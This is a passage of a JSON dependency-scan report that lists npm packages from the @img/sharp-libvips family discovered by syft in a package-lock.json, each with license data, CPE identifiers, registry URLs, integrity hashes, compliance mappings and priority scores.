"Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f40ef319dfe0f7ca", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4", "title": "@img/sharp-libvips-darwin-arm64 1.2.4", "description": "Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c127f66367bb283f", "name": "@img/sharp-libvips-darwin-arm64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-arm64:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-arm64:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_arm64:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_arm64:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz", "integrity": "sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f2d59ff4b7dad330", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-darwin-x64 1.2.4", "title": "@img/sharp-libvips-darwin-x64 1.2.4", "description": "Package discovered: @img/sharp-libvips-darwin-x64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9896d5c1cacbd583", "name": "@img/sharp-libvips-darwin-x64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-x64:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin-x64:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_x64:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin_x64:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-darwin:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_darwin:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz", "integrity": "sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7b39904a53a17a82", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linux-arm 1.2.4", "title": "@img/sharp-libvips-linux-arm 1.2.4", "description": "Package discovered: @img/sharp-libvips-linux-arm 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "35db8dcfe65acc63", "name": "@img/sharp-libvips-linux-arm", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz", "integrity": "sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "24ce05de10ecc79e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linux-arm64 1.2.4", "title": "@img/sharp-libvips-linux-arm64 1.2.4", "description": "Package discovered: @img/sharp-libvips-linux-arm64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b77c206e5d189694", "name": "@img/sharp-libvips-linux-arm64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm64:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-arm64:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm64:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_arm64:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz", "integrity": "sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "042fdfd641843c8d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4", "title": "@img/sharp-libvips-linux-ppc64 1.2.4", "description": "Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0a49b35ad8071788", "name": "@img/sharp-libvips-linux-ppc64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-ppc64:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-ppc64:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_ppc64:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_ppc64:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz", "integrity": "sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2eef65dffbde81a3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4", "title": "@img/sharp-libvips-linux-riscv64 1.2.4", "description": "Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "69aa9726ceb1125a", "name": "@img/sharp-libvips-linux-riscv64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-riscv64:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-riscv64:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_riscv64:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_riscv64:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 